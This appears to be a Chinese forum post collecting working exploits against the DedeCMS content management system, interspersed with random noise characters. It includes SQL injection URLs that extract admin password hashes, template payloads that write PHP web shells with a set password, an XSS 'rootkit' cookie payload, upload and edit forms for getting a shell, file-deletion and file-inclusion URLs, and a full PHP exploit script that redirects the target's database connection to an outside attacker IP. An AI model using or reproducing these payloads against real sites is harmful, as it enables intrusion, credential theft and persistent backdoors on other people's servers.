|
|
0 S% u# D8 V4 p; K. R& YDedecms 5.6 rss注入漏洞7 v! ]0 f% a2 b2 N8 d) K, y+ y
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1" W- Z& T) e6 x- ~; O
7 W5 W" s; j6 v9 L
3 ~0 L9 a, V$ @+ W, r& b) d& s8 N7 n, p( \8 n
7 I6 L/ E0 H% r2 v/ S7 G% _# u4 ~' l2 p" d- E' x
' N S9 m# t4 ?6 X
/ d3 r3 z. W# D5 i& b5 x I* F5 u
: `2 v- t1 \! N6 W/ |! N& P. X) TDedeCms v5.6 嵌入恶意代码执行漏洞
7 d$ O9 x/ H8 j; a9 C' V p注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}: b' o+ `$ C# R4 c( `& m
发表后查看或修改即可执行% {3 |" A* I! U* ~& {( K
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}4 ?' ]: Q9 E/ u9 K
生成x.php 密码xiao,直接生成一句话。# B6 m) F$ L& S1 ] |( h
2 B! E% o, M; n5 b' z+ J% @
7 ?# S' V6 e6 `1 N2 h* y- o# H
5 x0 [- v' y$ _ M$ y& w- R. V
; L+ s2 I A/ f; T& J8 ~' I8 c0 ?. y$ n4 `8 H
" e0 { g. c( j, P: M" F2 u6 V0 G) m# ^0 V8 Z# M3 ^# v& D8 U
% b3 j: t: I5 {9 w$ U% T1 ?Dede 5.6 GBK SQL注入漏洞
5 n! K1 u. v/ p! d4 {http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
4 a3 S$ u; G+ |3 {http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe* v! y! t3 f9 J% Y" A
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
3 U; ]1 v6 J9 X4 E- ~' [) m6 Y; N7 X6 J. r+ B. ~
3 ? C0 ~, i+ C' n% ^5 Z7 q! h p0 l3 a& k$ ~, k
3 j C5 l) S' ?, K
5 E7 n* @/ J) S* m) }! B: C( m0 T3 e$ C) q
& D4 _2 [+ S- u7 h
& G/ |1 t: L( nDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
) S! w" z" K, M& p' p( ^. Khttp://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
' p1 A! {6 f9 Y( @9 d" Z' t
- P+ }. d5 u( S8 O- P- r. n
+ I. Q! z. _) C$ [6 `
% _# [1 `+ f3 M" \" i2 Y# G" ?- @& }5 A, l" B
+ V+ [$ Y, j( U, {0 t; O: m w$ K; ]2 J" M: j Z: v
DEDECMS 全版本 gotopage变量XSS漏洞) h( k8 ?( O' n* n* Z- s' ?# O5 g
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 2 K& {( z7 j6 m. U6 X- M9 `
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
8 _* H! R& ^4 S) _5 v
3 P6 a A% p% x' k. y/ O
2 k, @7 b% }# ^7 X2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
: i' y% k! @: _+ Khttp://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda l5 M% t" c4 |/ K, s
$ S% }) P _ j9 M' R8 X
- B) j0 V& q' ~
http://v57.demo.dedecms.com/dede/login.php
$ f; T# n+ F+ Q x' q% e! m1 f" A! W5 G" E; ?: P$ D* ^
8 q Y- J# y! P& c: G2 |4 _ Ecolor=Red]DeDeCMS(织梦)变量覆盖getshell! f8 p/ v2 i4 w5 F, y/ T& X
#!usr/bin/php -w
0 @* `" X/ E( N1 \. A7 z9 Y5 a<?php
! S* N \7 Q3 i ~; C4 a6 Cerror_reporting(E_ERROR);
4 }4 n" I' w% N* b) Bset_time_limit(0);' |% S9 L% ?" s
print_r('0 _/ c9 z! G8 n5 O" Y3 ]
DEDEcms Variable Coverage
) @' K( P. ^' A) R) c( RExploit Author: www.heixiaozi.comwww.webvul.com
9 }- H" |# U& P( W% n$ Y' g);8 H7 {5 T/ t ^0 ]- _
echo "\r\n";
) o- V5 ^) `9 {/ h1 Dif($argv[2]==null){
( ^" x! u! _' a$ k- U% ]3 M Q5 jprint_r('
/ T( n6 ^5 v# s$ X& F8 ]+---------------------------------------------------------------------------+3 c+ G6 V2 _" a" R$ V7 U9 j4 |
Usage: php '.$argv[0].' url aid path
7 ^5 W. F1 a8 ~aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
: ^0 S X5 H3 W: k+ B6 [0 gExample:
/ A! q; Y' c* j2 \7 y) Xphp '.$argv[0].' www.site.com 1 old
+ A! u9 k+ Y c) N- s+---------------------------------------------------------------------------+! j; W( [. ~+ ^/ Y; H% h
');) {, W+ y; ]2 Z. h8 {/ d
exit;, M) O. O! J8 ^, X7 N4 l7 P" q4 v+ C
}
G% [: c4 u) p( i6 t/ z7 f. G$url=$argv[1];
1 E8 z$ g- p: w+ a$ _$aid=$argv[2];. }2 `4 I2 E: n' r+ J3 @4 t
$path=$argv[3];
, k& B6 \: Q5 ~$ y$exp=Getshell($url,$aid,$path);
0 H; D" E0 {7 n3 c7 |, fif (strpos($exp,"OK")>12){
2 e" \3 [: X% b* W% p& ^echo "
0 m, ^8 C# h, {+ D/ O+ ]! H( oExploit Success \n";
. n" |5 ~8 ]4 _, Y4 W$ z# f Gif($aid==1)echo "
7 T1 H9 n, N. a% ZShell:".$url."/$path/data/cache/fuck.php\n" ;2 w2 T9 x( \' u$ l2 Y# y. a
' k; x9 |1 b) e: f% @- H
" `, O0 L- q- o8 X
if($aid==2)echo "5 c0 T- v }6 v6 Z! C" X
Shell:".$url."/$path/fuck.php\n" ;+ F M7 q& S* u
" L$ |+ ]- g1 {3 V
' n7 L( s; y, }* hif($aid==3)echo "4 @0 p7 k3 Y$ z' y Z4 M. Z
Shell:".$url."/$path/plus/fuck.php\n";, |- O. Q9 {) U3 Z, @' W ?! ?" H
/ l _! E8 n- f$ T5 p; b
& ~( Y6 B, c0 K+ z: F: V' T( m
}else{" `0 ]# w0 }/ C& I4 U/ x9 B
echo "
# x1 r: n/ ~, |9 {+ I. y4 @1 hExploit Failed \n";$ E5 v* ?) D) f7 Q! z8 h! g
}4 ^- T; Q0 X/ h) {) x
function Getshell($url,$aid,$path){
3 a& N$ a T7 ]; J2 O5 O4 i( d$id=$aid;
0 z0 J6 @6 h+ u1 n6 O7 f$host=$url;) K% i7 o. o" c, [
$port="80";
/ v8 c' L/ _# z" ~6 p( I$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";- J) `( A( @' D, R; {. I
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";' [ ]3 m9 v: o y- [2 z( ]2 ^
$data .= "Host: ".$host."\r\n";7 z: k! K8 [7 h
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";( z. m2 x1 A0 w& O: W& i8 Z. O
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
; @+ K6 m* K) B+ W* u1 N$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
5 j& y; D" y: B( _; U" T//$data .= "Accept-Encoding: gzip,deflate\r\n";
0 ^3 I- B, Y) s$ p$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
0 H" t1 G0 T% I3 q6 f; w$data .= "Connection: keep-alive\r\n";" e0 l6 e1 ^/ t4 t
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$ m# j, H, E& `- v6 x: t$data .= "Content-Length: ".strlen($content)."\r\n\r\n";. f+ q p# e e) R% N3 `! C
$data .= $content."\r\n";
9 _3 D9 o3 r3 d. A; K" B2 o$ock=fsockopen($host,$port);) J$ D- P; |( N# n: W, n
if (!$ock) {
$ P3 ^' ?2 s3 ~' A/ Oecho "
3 C( \! \# @" Y' s$ s ENo response from ".$host."\n";7 r+ g1 I& t0 a' o; |( d
}- E0 V1 C! M+ Y2 e X1 L: Y
fwrite($ock,$data);
" Y* P. n9 E- S2 ewhile (!feof($ock)) {
9 L! c9 T* R3 L$exp=fgets($ock, 1024);9 a. ]( W+ H' |( C: ~1 H( T5 O' Y& w
return $exp; W+ y U* I4 Y
}
9 U. {% z7 X8 ^) U}( [5 ^- Q9 _% I- T. t5 [, y
, m I+ X P: o
7 N1 h4 ?: a. j8 _2 k?>
8 J" B2 C% y3 K, ^/ ?
# w9 m o% D/ B1 A: ^9 s
! C) t; ~7 w5 B2 U5 ?# r( @, @: \2 P6 r2 ~" m. w
1 M1 B, q R2 y$ ]# `" F& k
; h6 x5 H, e+ l, d! o/ ]4 j
8 b/ g% Q+ q$ w6 W3 L
+ \( h: L( |: a$ z& W; A+ P
$ U: I' H/ Z' {% u- w3 X/ }
* Q2 L, l# v8 ?
% P9 g2 M. C- v j2 e" fDedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
, y# t* Q' O6 w2 Y# m+ n; ehttp://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root8 T; P* H* T3 o& f% o
5 S% z0 P; \1 ^& b+ e' K. o; I
; |- r$ x0 u$ x' y+ k
把上面validate=dcug改为当前的验证码,即可直接进入网站后台
5 G. b+ I( }6 I" \6 a! ^- W) Z0 p
2 Y; Y# n+ \. U2 P: p# w5 g Z A. C
此漏洞的前提是必须得到后台路径才能实现$ {' { {- Z% u( Q+ X. i" S
l4 M! T8 t" t0 P8 S+ I
5 q! X; U' S% q; K5 ?
F8 w# S2 [9 y9 ^8 Y
; z" W7 W9 B: o/ B# B3 q5 e: t2 n& h0 C3 C' j6 w" f% A: [
( J1 g$ |9 c7 v# s! q" P- P: n* m' K$ ^
3 p) X% [% D) f9 e
) B8 a4 u0 K* f; S* D% Y
7 a5 @1 Q( v; ~- I6 m
Dedecms织梦 标签远程文件写入漏洞
; R8 b4 z8 h+ k& g$ i7 K! E3 q r前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
( O" e+ x. D G. ?1 y5 b4 \1 t: F) u) \8 O3 v
- m6 P4 y ~% I: c4 ~再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 ! \" H: r: f3 L
<form action="" method="post" name="QuickSearch" id="QuickSearch">9 n: |5 L8 A# e9 v% E3 I
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />$ f8 z5 X( `0 Z( L& N$ t* T
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
; S ?3 G$ J% _8 w4 F<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />" p% q' _: x/ j9 I9 E. \, }& J
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />" c8 x0 n# j# T0 Z
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />- T* L+ v4 Z; U% f
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br /> T) V, d* C. t: ^7 [7 r$ n+ J
<input type="text" value="true" name="nocache" style="width:400">
! K5 d& Q( r8 L, [; w* j<input type="submit" value="提交" name="QuickSearchBtn"><br />
7 l6 q) U/ W1 {* Q</form>) y# x# i1 K# V" w
<script>2 `, U) ^; O- |: J5 B. m) B
function addaction()# x9 C# T+ t# O6 n
{
( ]# B9 T1 W E* Ndocument.QuickSearch.action=document.QuickSearch.doaction.value;) C5 Z+ ]6 G3 e6 o
}# V# t/ V" U5 ?- Z/ }4 k
</script>
4 x! {8 N# t( K' h. W' n+ H$ Q
6 V& q! T$ Z& @9 U1 H2 w) l; h0 S' `" k
2 S* K0 W8 z/ N) Y$ E5 |! K
9 b; ~* {0 u, g1 A$ t4 p4 e* T3 R9 L" l. {7 c; `
/ n; V/ P- S/ }2 L9 }
3 E7 t) i5 r2 E$ G
* c. a) ` l n# c2 Z6 O6 r$ \2 A
3 J' Q! j+ s- _8 E% _2 ^1 s* W/ n8 ?0 f/ @, Q
DedeCms v5.6 嵌入恶意代码执行漏洞
% F8 h$ S2 i; y注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
" A; L- M! }8 l ~3 s5 R7 ia{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}% X% a0 Z6 u% k( E' e7 ?
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
* p4 k3 U" F! J$ G) lDedecms <= V5.6 Final模板执行漏洞
! b2 S/ H/ V( L6 L& S注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
- G) _/ j! f9 Q ]! E4 Uuploads/userup/2/12OMX04-15A.jpg- b) @3 ]- M# b. q
) ] g' T% M( P9 | H: [9 @; R# W
# f/ R& b3 \( s2 _1 R P模板内容是(如果限制图片格式,加gif89a):
% y6 o: w$ j0 {: d8 n, x{dede:name runphp='yes'}
# K% `! N) }$ n3 C, o$fp = @fopen("1.php", 'a');
5 h1 V) C9 P% ]' ?$ [- q7 n2 u@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
9 d3 U7 M" l. [: o/ U@fclose($fp);% _9 z& k: L( ]
{/dede:name}
( {2 [$ r- P# G% m& w- |2 修改刚刚发表的文章,查看源文件,构造一个表单:
7 r+ }* \4 Q3 E5 G<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">8 ^' j+ J! e8 v3 W- L, B$ u
<input type="hidden" name="dopost" value="save" />
$ p3 \2 h% F% G0 f& a0 m9 `<input type="hidden" name="aid" value="2" />
# p0 }1 j7 k) H* k& @6 W2 a<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />! _$ [" l7 ?* g+ G
<input type="hidden" name="channelid" value="1" />
' F5 }# N4 o& j; T. {<input type="hidden" name="oldlitpic" value="" />
! o* h! Q& v% O. b5 B/ Y+ U0 `<input type="hidden" name="sortrank" value="1275972263" />. B2 X9 q- }0 _7 _: P/ W9 d9 J6 N
* G% U& _9 i- x8 q$ M
4 I+ A8 r2 k0 P$ f5 E( `<div id="mainCp">$ t! z& ]3 I' @. ]
<h3 class="meTitle"><strong>修改文章</strong></h3>* P+ e' y/ v2 f8 M
- z+ o4 E: E9 ^
2 Y/ u, ~/ s8 o L! X9 ]<div class="postForm">: Q% O: M( _5 e+ M
<label>标题:</label>: p6 L+ A, |6 G t1 f5 t
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>1 }" X7 }4 _& K5 o
' c# g h% p3 C7 w2 A7 ~% C5 v z. i! e9 E6 Y
<label>标签TAG:</label>* b8 M; W& | ]6 {
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开) U/ }/ t0 l& v0 a% S
9 F% o6 W3 k- B4 [- s& j5 Z9 Z# w9 ~8 W$ \* D3 }
<label>作者:</label>( p' m9 |% ?( g0 M7 A X8 t) p: u1 Q5 I
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
" I4 ^8 ~% f/ Q5 r7 O
; K# P, U2 C: Z( u1 H
% m a9 A/ f' A' s; I* n, k% e: f8 b<label>隶属栏目:</label>
4 K& K* J( N3 E4 _6 v4 c<select name='typeid' size='1'>/ n/ Z7 Z% m! z8 f
<option value='1' class='option3' selected=''>测试栏目</option>
0 O! R+ F+ L3 G7 J/ R</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
S( Z! l, B" d+ a- o2 ~. m# j' K/ h8 a1 H+ h3 q7 A
3 p6 [1 E# Z% @+ U; j<label>我的分类:</label>) u, s8 z# z! @+ F+ h
<select name='mtypesid' size='1'>0 }* T. B6 s! a3 ~( F+ V: Q
<option value='0' selected>请选择分类...</option>
/ z: ~+ \+ K0 J7 N# I$ `, }<option value='1' class='option3' selected>hahahha</option>
. c' i$ p1 G% v% g( N, s</select>& b6 ] }. ?/ @$ y8 t
5 l/ O9 K% F- s9 S& ?$ [9 r
$ n- h! b; `2 J6 t& [3 \: h% b<label>信息摘要:</label>
3 [+ T( G. {8 A" K<textarea name="description" id="description">1111111</textarea>- Q- }# {& o$ T
(内容的简要说明)$ K3 P! a( C8 {" Y7 Q
! c; q, r" `$ g3 K4 U; W
, k0 q( d; M s7 |7 q<label>缩略图:</label>
8 W/ a) G+ }* d- r% H7 _+ |<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>. ~8 O) ^% Q! x6 A8 V# a
$ N; f/ o, T2 E( P) o" i/ F$ U+ a1 Z$ i5 @8 I0 j5 o) O
<input type='text' name='templet'
; f5 V6 R/ B& T- N5 m0 M/ Hvalue="../ uploads/userup/2/12OMX04-15A.jpg">
6 W" F4 y- q; Y4 d<input type='text' name='dede_addonfields'
3 F7 U+ p7 x: S6 p9 @8 Mvalue="templet,htmltext;">(这里构造)/ H2 ?8 ~& Y0 _3 R0 J
</div>
3 L3 t" L+ e* J" m- r' u
' `" G+ Z. `- @4 W$ D C& g1 m1 y: O" G1 y7 f @6 w: ^" F
<!-- 表单操作区域 -->$ E7 U1 W0 r# \% C- ~
<h3 class="meTitle">详细内容</h3>
0 G" e. H- ^ u$ n, S; K- ?3 g3 g2 Y$ o1 r
r J) y# C. `1 r
<div class="contentShow postForm">8 v3 C8 g$ o) s; ~
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>* C+ r" p5 a/ `! S& c+ [* ^
6 V9 \0 B. ]% d- x$ u/ N$ U6 g+ v
" J7 U+ R" q5 |! A# ]9 _+ r<label>验证码:</label>, H/ A0 f; t( d
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
! Z9 O3 x/ ~$ h<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
5 ]3 y/ A& Y' s0 _/ B& U* V+ k5 f4 e! d R" _. z& E; Q8 V# O
) W$ d+ ?; ~; |: h2 U<button class="button2" type="submit">提交</button>, ?* }' I* F3 z0 T; j2 F+ e
<button class="button2 ml10" type="reset">重置</button>
1 x# h9 U3 J2 z( P! _8 B</div>
9 b5 E* }* i' V$ e! b& P
! m ?2 [: c" z7 ]: ?: X) q6 g+ Z, F7 O/ S% I
</div>
8 x7 a# w/ Z' A+ \5 O4 Z1 {$ d0 K+ G+ H ^- t
' d5 T: ?; S R0 q! y& i0 ]</form>
7 h) |& M( Q! }( N
6 a' V, K' L) N' P, V/ ?9 @0 K+ P: ]7 Y2 l8 a. D, m: c
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
_1 P5 _. R4 H) O" t假设刚刚修改的文章的aid为2,则我们只需要访问:' g4 Y* T3 R. j' N4 N; u- f$ }* D
http://127.0.0.1/dede/plus/view.php?aid=2
- e! W" [% }: Z: I9 j6 a即可以在plus目录下生成webshell:1.php
; O# @6 C% E+ I- n. m
2 I- ^0 K6 H( i" f* ~* c! q! F- W5 \% J, C) d: g
" _; \4 V+ N, `
C% j9 A+ M5 S
4 a6 }# @) ]' R% N2 }1 e% J: K; c. R2 J, X" ?6 ^% \3 S7 ]2 B
& y7 ^6 I6 G K$ W Z/ q
; U2 s8 u' [2 Z9 L" e
! i' Y! K/ P$ D2 d" `' @. g# e' x* X& j0 Z
: G: }4 h' ?& B+ v7 H/ e
# i6 ?9 u: d; C9 d* M" O! C
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
9 d# ^$ O) G; BGif89a{dede:field name='toby57' runphp='yes'}5 O7 }( {4 r9 ~
phpinfo();
2 F+ Y! P O4 t% y{/dede:field}7 c& \, C/ O2 S) k) m; j- Q8 w
保存为1.gif
' C' Y) _- @1 s/ w7 D) _<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> , i4 Z: d, |( _ z1 y
<input type="hidden" name="aid" value="7" />
( x/ \2 y1 ?5 A9 B<input type="hidden" name="mediatype" value="1" /> # {/ w( {3 w( i" y6 n
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
3 U0 f3 R* k% j" _/ B<input type="hidden" name="dopost" value="save" />
^5 m* u( o# Y( j; T& D! b<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
. K$ t: u! j8 v+ C3 ?<input name="addonfile" type="file" id="addonfile"/> ) O; F$ N; X% D/ C. D1 D, H/ n4 @
<button class="button2" type="submit" >更改</button> `" g/ K! T& T% H
</form>
* H# @) n! r8 t- Z. }
: M. J, D! J: z; r
8 `. `# P, H8 T. {3 t构造如上表单,上传后图片保存为/uploads/userup/3/1.gif; f: ^6 ]8 }. f" e: p
发表文章,然后构造修改表单如下:
( l. v4 s; q. C* l
& ?$ H, J r8 R( D
, g& l% L% E4 X4 g' T4 w<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
4 u1 c, r* ~0 ~" Q" E2 O; q<input type="hidden" name="dopost" value="save" />
% I! q( R# T: m8 v2 }: a5 t<input type="hidden" name="aid" value="2" />
! b' z6 x3 r: h j<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> 6 H# Y' t0 h3 W+ E9 w$ J+ U
<input type="hidden" name="channelid" value="1" /> , n1 z8 J- _& q: D! ^
<input type="hidden" name="oldlitpic" value="" />
; z! L: s# t+ V<input type="hidden" name="sortrank" value="1282049150" /> - r* a5 e7 l- x/ @
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
! @4 [+ e- ?) W3 Z. `5 c. c7 a( r<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
4 s3 q7 |1 `* ~+ F, E<select name='typeid' size='1'> ( t6 T; F- u9 Q) X9 t5 R/ S/ ~
<option value='1' class='option3' selected=''>Test</option>
) c s [6 n9 A% ^7 Y<select name='mtypesid' size='1'> * K9 u2 b+ i( A$ O* z
<option value='0' selected>请选择分类...</option>
5 @; U: u6 L' {. U B$ l<option value='1' class='option3' selected>aa</option></select> * D( G% q! y# H
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
- B. `. e) ]/ R6 M' Y0 u8 q, U: b<input type='hidden' name='dede_addonfields' value="templet">
! p& B4 h# F' N* I6 @: ]<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
, ^% B8 M$ v; p& N<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> s# a2 T4 L! F, o2 D5 \! d
<button class="button2" type="submit">提交</button> 7 a( J( C& q7 i* e+ ?& i
</form> z' I4 \: G5 B1 d2 z
& [* q4 D( q7 B( r9 p; ?
7 R- W! b1 q' m, A8 B) n$ Q
0 J, T9 Z5 T, n- Y' y& m
$ P4 q) n3 q" r3 u7 x4 x0 E* w
F" o* U( |: e" g$ A
, j3 C) G/ }+ P# y( [- d+ u' ^3 X. {* y
* k, n* J8 _- H1 Z; w4 V
( v- U# g1 T7 I: S/ G1 y' j
0 n6 Q( y7 n, l& z! c
y3 y S; F- S) T5 z! z
* C9 H8 f# ^/ x" `! W! ~# F织梦(Dedecms)V5.6 远程文件删除漏洞% `8 c- u7 @. x5 R
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
' D6 U, z7 J! B4 _+ \7 ` `5 i5 T8 r7 S; ^5 f
% ]! J" A- {( P C# B* f7 M
: ~3 ~% U! x& Q J o# Z
" w l' @! ~* \, a
. ^. c- {# f" A+ k4 E6 L
& y( V' X x' N# x/ i6 ]
3 _" X& m `* F) Y0 f, H' s: S) I
3 J, h& l5 l+ H
( }" k# c/ g$ f0 \. j织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 , @& I$ P* [, O) v
http://www.test.com/plus/carbuya ... urn&code=../../, n/ V ]/ n+ M- o- O/ q& _
y) x( W, x9 _. s8 z% n$ K1 a( Z% P/ M8 L& ?7 q; v; F
" h s0 K8 W) P5 D& }
3 y+ `8 ~5 n( v: w3 Z3 Q$ y0 M
1 s# [1 ~* x' V
' _2 b! \2 t8 i2 o
9 ]$ \. Z9 [0 b( d* b; l$ K0 H$ w' T4 p# y8 c2 R, y* \
/ d1 N6 M. w6 D4 d+ i" b- P
% L$ I+ Y1 ^: v+ J- J
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
4 d9 B4 @, ]9 [ d, pplus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`; [& T& M, l5 `( b
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5: H+ U% p1 l" l! B4 a; W) ?( d6 }
& a) }* o* `% u
+ M1 T P& Y8 b, M
$ H3 U1 i X2 S6 d) k, Q. m& H3 ^+ i: }3 b
4 I( ^. `: E0 |& ^4 b2 {
( [0 F9 J) E5 T- u; |3 i4 L3 P& m! B; R
" t6 u/ f" _% C u1 ?& t
% A# s7 u6 ]- ~1 i" i+ `9 W) s! \9 `7 u6 x
/ M) b5 r- F2 |. Z织梦(Dedecms) 5.1 feedback_js.php 注入漏洞/ P1 o4 ]( K& T- s& N$ e
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
2 R3 y. |" _ a" N+ w2 A7 F! a" {
, y- L6 a: l: F- D/ N5 X$ Q# Z8 \8 p" C
0 P' H/ b& |: F. p+ p$ [! E
, b0 ? X! `; T$ H) U( r- \2 j0 ]
& I9 K- j; @/ t+ u2 ^
! z9 \2 u p1 V& s* k$ \
0 ?! \' A1 u9 E# V6 C+ P
' q( f4 @# U! K2 Q# g: I* d; |; O, B4 |: _+ O2 V, X/ Q0 t
7 J5 r5 R2 p8 K3 \) B; V+ D织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
9 x! G6 n, k8 x! ^9 `- F<html>
3 r- _! a: m$ n0 x<head>' |9 J: Y( N8 g% e5 e! G
